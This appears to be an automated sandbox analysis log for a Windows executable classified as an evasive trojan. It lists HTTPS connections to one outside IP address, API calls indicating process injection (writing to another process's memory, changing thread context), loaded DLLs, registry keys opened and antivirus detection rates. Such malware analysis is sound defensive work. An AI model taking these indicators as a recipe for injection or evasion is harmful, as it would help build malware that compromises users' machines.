            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
            Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
            Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
            Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
            Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
            Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49777 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49779 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49781 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49783 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49787 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49789 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49791 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49793 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49799 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49805 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49808 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49811 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49818 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49830 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49846 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49859 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49871 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49883 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49895 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49907 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49919 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49930 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49942 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49954 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49967 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49982 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49992 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50004 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50016 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50028 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50038 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50050 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50061 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50073 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50087 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50099 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50112 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50124 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50129 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50131 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50133 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50135 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50137 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50139 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50141 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50143 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50145 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50147 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50149 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50151 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50153 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50155 version: TLS 1.2
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0286DFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0286DFE4
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02867CF8 NtWriteVirtualMemory,0_2_02867CF8
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02868BA6 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02868BA6
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02868BA8 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02868BA8
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0286DE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0286DE24
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0286DE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0286DE78
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0286DF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0286DF00
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0286F0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_0286F0A8
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_028520C40_2_028520C4
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0287E59A0_2_0287E59A
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: String function: 02868798 appears 54 times
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: String function: 028544D0 appears 33 times
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: String function: 0285480C appears 931 times
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: String function: 0286881C appears 45 times
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: String function: 028544AC appears 74 times
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: String function: 028546A4 appears 244 times
            Source: LbZ88q4uPa.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: classification engineClassification label: mal76.troj.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02857F54 GetDiskFreeSpaceA,0_2_02857F54
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02866D48 CoCreateInstance,0_2_02866D48
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: LbZ88q4uPa.exeVirustotal: Detection: 81%
            Source: LbZ88q4uPa.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeFile read: C:\Users\user\Desktop\LbZ88q4uPa.exeJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: url.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: smartscreenps.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: rasadhlp.dllJump to behavior
